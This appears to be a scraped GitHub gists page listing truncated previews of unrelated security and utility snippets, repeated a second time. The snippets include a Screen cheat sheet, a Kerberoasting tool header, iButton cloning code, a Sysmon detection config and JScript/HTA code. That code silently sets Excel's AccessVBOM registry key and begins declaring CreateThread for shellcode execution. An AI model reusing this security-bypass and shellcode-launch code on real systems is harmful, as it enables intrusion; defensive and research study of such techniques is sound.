Anthony Bordel minkione

## iButtonRW.ino
 // Based on https://danman.eu/blog/cloning-ibutton-using-rw1990-and-avr/
// and: http://elimelecsarduinoprojects.blogspot.com/2013/06/read-dallas-ibutton-arduino.html
// By Swift Geek 28-08-2015
// TODO: danger to atmega328! Use OpenCollector logic!
// Used 4.8kΩ Pull-up and 3.1 Vcc for arduino/pull-up

#include <OneWire.h>

OneWire ibutton (8); // I button connected on PIN 2.

## screen.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                minkione
                / screen.md
            
            
              Created
              February 1, 2017 18:43
                — forked from fredrick/screen.md
            
              
                GNU Screen Cheat Sheet
              
          
    #GNU Screen Cheat Sheet
##Basics

ctrl a c           -> create new window
ctrl a A           -> set window name
ctrl a w           -> show all window
ctrl a 1|2|3|…     -> switch to window n
ctrl a "           -> choose window
ctrl a ctrl a      -> switch between window
ctrl a d -> detach window


## Invoke-Kerberoast.ps1
<#

Invoke-Kerberoast.ps1
Author: Will Schroeder (@harmj0y), @machosec
License: BSD 3-Clause
Required Dependencies: None

Credit to Tim Medin (@TimMedin) for the Kerberoasting concept and original toolset implementation (https://github.com/nidem/kerberoast).

Note: the primary method of use will be Invoke-Kerberoast with various targeting options.

## example.js
var objExcel = new ActiveXObject("Excel.Application");
objExcel.Visible = false;
var WshShell = new ActiveXObject("WScript.Shell");
var Application_Version = objExcel.Version;//Auto-Detect Version
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
var objWorkbook = objExcel.Workbooks.Add();
var xlmodule = objWorkbook.VBProject.VBComponents.Add(1);
// Sample Shell Code Execution Documented Here: https://www.scriptjunkie.us/2012/01/direct-shellcode-execution-in-ms-office-macros/
var strCode = 'Private Declare Function CreateThread Lib "kernel32" (ByVal Npdrhkbff As Long, ByVal Drcunuy As Long, ByVal Ache As Long, Wiquwzp As Long, ByVal Ltdplqkqj As Long, Xsawbea As Long) As Long\n';

## CalcExcel.hta
<html>
	<head>
		<script>
			var objExcel = new ActiveXObject("Excel.Application");
			objExcel.Visible = false;
			var WshShell = new ActiveXObject("WScript.Shell");
			var Application_Version = objExcel.Version;//Auto-Detect Version
			var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
			WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
			var objWorkbook = objExcel.Workbooks.Add();

## launch_url.txt
%PDF-1.0

1 0 obj
<<
/Type /Catalog
/Pages 2 0 R
/Names 6 0 R
>>
endobj

## simple-https-server.py
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.xml with the following command:
#    openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
#    python simple-https-server.py
# then in your browser, visit:
#    https://localhost:4443

import BaseHTTPServer, SimpleHTTPServer
import ssl

## Python SimpleHTTPServer with SSL
# useful for running ssl server on localhost
# which in turn is useful for working with WebSocket Secure (wss)

# copied from http://www.piware.de/2011/01/creating-an-https-server-in-python/

## psx.py
## hacked together by @JohnLaTwC, Nov 2016, v 0.5
## This script attempts to decode common PowerShell encoded scripts. This version handles:
##  * base64 data which encode unicode, gzip, or deflate encoded strings
##  * it can operate on a file or stdin
##  * it can run recursively in the event of multiple layers
## With apologies to @Lee_Holmes for using Python instead of PowerShell
##
import sys
import zlib
import re

## config-client.xml
<!--
   This is a Microsoft Sysmon configuration to be used on Windows workstations
   v0.2.1 December 2016
   Florian Roth (with the help and ideas of others)

   The focus of this configuration is
   - malware detection (execution)
   - malware detection (network connections)
   - exploit detection
   It is not focussed on
	// Based on https://danman.eu/blog/cloning-ibutton-using-rw1990-and-avr/
	// and: http://elimelecsarduinoprojects.blogspot.com/2013/06/read-dallas-ibutton-arduino.html
	// By Swift Geek 28-08-2015
	// TODO: danger to atmega328! Use OpenCollector logic!
	// Used 4.8kΩ Pull-up and 3.1 Vcc for arduino/pull-up

	#include <OneWire.h>

	OneWire ibutton (8); // I button connected on PIN 2.
	<#

	Invoke-Kerberoast.ps1
	Author: Will Schroeder (@harmj0y), @machosec
	License: BSD 3-Clause
	Required Dependencies: None

	Credit to Tim Medin (@TimMedin) for the Kerberoasting concept and original toolset implementation (https://github.com/nidem/kerberoast).

	Note: the primary method of use will be Invoke-Kerberoast with various targeting options.
	var objExcel = new ActiveXObject("Excel.Application");
	objExcel.Visible = false;
	var WshShell = new ActiveXObject("WScript.Shell");
	var Application_Version = objExcel.Version;//Auto-Detect Version
	var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
	WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
	var objWorkbook = objExcel.Workbooks.Add();
	var xlmodule = objWorkbook.VBProject.VBComponents.Add(1);
	// Sample Shell Code Execution Documented Here: https://www.scriptjunkie.us/2012/01/direct-shellcode-execution-in-ms-office-macros/
	var strCode = 'Private Declare Function CreateThread Lib "kernel32" (ByVal Npdrhkbff As Long, ByVal Drcunuy As Long, ByVal Ache As Long, Wiquwzp As Long, ByVal Ltdplqkqj As Long, Xsawbea As Long) As Long\n';
	<html>
	<head>
	<script>
	var objExcel = new ActiveXObject("Excel.Application");
	objExcel.Visible = false;
	var WshShell = new ActiveXObject("WScript.Shell");
	var Application_Version = objExcel.Version;//Auto-Detect Version
	var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
	WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
	var objWorkbook = objExcel.Workbooks.Add();
	%PDF-1.0

	1 0 obj
	<<
	/Type /Catalog
	/Pages 2 0 R
	/Names 6 0 R
	>>
	endobj
	# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
	# generate server.xml with the following command:
	# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
	# run as follows:
	# python simple-https-server.py
	# then in your browser, visit:
	# https://localhost:4443

	import BaseHTTPServer, SimpleHTTPServer
	import ssl
	# useful for running ssl server on localhost
	# which in turn is useful for working with WebSocket Secure (wss)

	# copied from http://www.piware.de/2011/01/creating-an-https-server-in-python/
	## hacked together by @JohnLaTwC, Nov 2016, v 0.5
	## This script attempts to decode common PowerShell encoded scripts. This version handles:
	## * base64 data which encode unicode, gzip, or deflate encoded strings
	## * it can operate on a file or stdin
	## * it can run recursively in the event of multiple layers
	## With apologies to @Lee_Holmes for using Python instead of PowerShell
	##
	import sys
	import zlib
	import re
	<!--
	This is a Microsoft Sysmon configuration to be used on Windows workstations
	v0.2.1 December 2016
	Florian Roth (with the help and ideas of others)

	The focus of this configuration is
	- malware detection (execution)
	- malware detection (network connections)
	- exploit detection
	It is not focussed on